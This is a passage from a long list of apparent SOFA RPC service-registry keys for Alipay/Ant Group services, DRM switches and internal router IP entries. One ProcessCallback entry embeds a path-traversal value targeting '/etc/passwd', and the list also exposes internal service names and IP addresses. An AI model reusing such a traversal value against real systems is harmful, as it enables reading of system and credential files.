alipay.zdal.ldc.tair.idatacontextTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:amlcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskxm.sdk.appmessage.facade.RemoteSubscriberAppMessageObserverFacade:1.0:remote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_169.254.35.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.aipPromoPackVoucherDefaultMaxPurchaseAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.aliyun.apsarabase.euler.meta.service.facade.api.CloudFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlementprod.common.service.facade.api.SettleAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistGroupManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbpromocore.common.service.cert.api.CertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.requirement.service.facade.RequirementBizRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcswitchbase.facade.CommonMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.pullBatchSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmergencyDomainManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.fundsche.api.AccountCollectionManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dataclassification.facade.service.DcpTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.finpwmStarMaxCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:dcepweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-bankAccountListPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filebridge.service.facade.FileBridgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ServiceTask:1.0:ruleInfoServiceTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.TR_UI_v2.3.061200:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.biz.eventing.privateapi.ServerlessEventReceiver#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.certifymng.service.facade.UserLimitedTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.CompanyReduceRuleFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.baitiaoprod:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cloud.opscore.common.service.facade.deployment.AppReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acnotifycore.common.service.facade.MsgSendFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.240.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promohelix.common.service.facade.api.sci.TaskAttributeOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.RiskCheckOptionConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.116.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mitemcenter.common.service.facade.api.query.ItemQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmMerchantAttachmentQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.api.AssetsOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.SearchProductOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata3.schedule.rpc.service.ops.FieldInstanceSetSuccessService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.126.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finnet.service.facade.flux.query.FinnetInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.createStarWishNumberLimitConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.comparacenter.common.service.facade.client.CardBinQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BalanceFreezeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenSecuUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.BizSceneMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.103.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkcupaprod.common.service.facade.api.AuthorizationCodecManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.finVoucherOrderTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapitool.facade.ugw.UnifygwServiceManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icredittrans.service.facade.api.CreditTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP-F-MINITRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openevent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:instpayAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.addpTairTempDuration,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.yebplus.YebPlusContractQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.70.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_C_CTUSTOCK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.auth_center.common.service.facade.cert.CertificateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceQueryApi:1.0:v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqInfluenceNormalizationDrm.toutiaoPropagationValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.defaultProperties,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundtaskcenter.service.facade.FundExceptionRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.BatchPayReceiptService:1.0:paycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.materialcenter.common.service.facade.api.material.BatchRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.cpmRollTaskGrayCheckUserIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP-C-securitycenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.142.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.70.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.innertrans.facade.api.InnerAccountDailycutManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.finslip.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.StuffStockFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.199.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.api.PayRevokeService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.sign.facade.SignCommonService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheDRM.refreshKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.chaos.dig.facade.HeartbeatFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.pcardDeduction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.facade.manageapi.ApiGroupManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:findecisionTechProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.123.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zhimago_expire_quit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:ddsconsole-mybank-akesit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchmobile.common.service.facade.mmcard.MrchMemberCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.entity.EntityMaintManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MMTCAFTSCMDPROC#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskmodelcenter.common.service.facade.meta.MetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csconfig.service.facade.api.DrmMessageService:1.0:merchantService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:fascore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.common.service.facade.api.market.FqpQcSecurityMarketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.dal.ClusterRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_INSTSERVICECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftbaascore.api.facade.SpaceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.permlimit.api.PermLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.InstSignOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/\\\\\\\\\\\\..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.miniloan.seventhevening.ActivityOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotcore.spi.MessageSpi:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.ci.CodeAttackCiTestTaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.rockfuzz.common.service.facade.FuzzFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaimcenter.common.service.InsClaimStatisticsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseInjectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.qianli.common.service.neardata.facade.QianliDbControlFacade:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:testCCA@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.manage.CampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.solution.SolutionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finmatchcore:name=com.alipay.finmatchcore.common.service.facade.client.drm.MatchConfigClientDrm.bizLimitConfigStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:pointcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.raiseInterestVoucherProductCodeCheckSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdabombardier.common.service.facade.product.IotArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReTenantServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@rassistcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.cifin:name=com.alipay.cifin.bankcard.core.service.resource.drm.UsageCardEventDrmResource.ccpaymentControlSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.service.cert.facade.CertRelevantService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.assets.AssetsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mm_open_fund_account_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.httpsDownloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.salesmng.common.service.facade.orderlink.OrderlinkNotifySyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.shop.admin.ShopAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.api.ApiAppSwitchFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pricemng.common.service.facade.api.price.PricemngQueryPriceExtraInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.viponly.VipOnlyRouteRestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:zmoperationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.commom.manage.facade.contract.api.ContractInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.GrayControlDrmResourceTrigger.userRateGray,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fincommontaskhub.service.facade.service.spi.MergeService:1.0:vehownerprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.apis.RiskEntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.openhome:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.sdlib.namelist.StrategyGreyListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pricecenter.common.service.facade.api.PriceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dctlib.common.repository.mng.HealthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.share.partner.PartnerManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.63.241.222#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.AuthScopeManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.CodeRouteService:1.0:distinguishprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepcore.common.service.facade.service.data.UserGroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.consumecenter.ConsumerRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundtrade.common.service.facade.api.FundPeriodAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsecu.common.service.facade.api.bigevent.EventArchiveFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.api.VerifyService:1.0:uioservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insuserview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlementprod.common.service.facade.api.CommissionBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.cleanup.InstUserCleanupFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.AppInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.OperateLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArOperateServiceFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:factoringcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenestarwish.common.service.facade.api.query.FinsStarWishBizQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_register_login_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FundTradeRzoneSwitchDrm.whiteOrderIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mfinquotationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkInitCardMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_rejectCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vein.winbillboard.common.service.facade.graph.IEnhanceFullDataQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.abilitycore.common.service.facade.adapter.ApiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.181.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.ps.rpc.facade.UserMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_ASYCNTRANS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tradeexprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.elf.facade.console.customer.CustomerQueryManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.129.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assetfluxdecision.biz.service.api.FluxDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acwareslifecore.common.service.facade.CreditControlEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectcore.common.service.compile.ScriptCompiler:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:enterprisecif@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.export.ReportExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaBizTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsPolicyInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.QuestionExtensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publichome.common.service.facade.cicada.ZdalOssServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.PatternSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.biz.rpc.dynamic.conf.MobileAppDynamicConfService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CHARGE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.djWarmUpDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchiswisdom.platform.common.service.facade.api.record.RecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdRobotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.RefundOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.manage.api.QuerySettleAccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","coveragecenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.167.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.apply.AssetApplyOrderTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.FluxReceiptService:1.0:fascore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fscdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileappcommon.common.service.facade.baas.GreyTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.manager.RuntimeSpaceDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.taskflow.repo.YebcTaskRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.65.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ipsponsorprod.biz.promo.service.LotteryMallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dwsap.common.service.facade.datasource.OdpsTableColService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.etetestcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.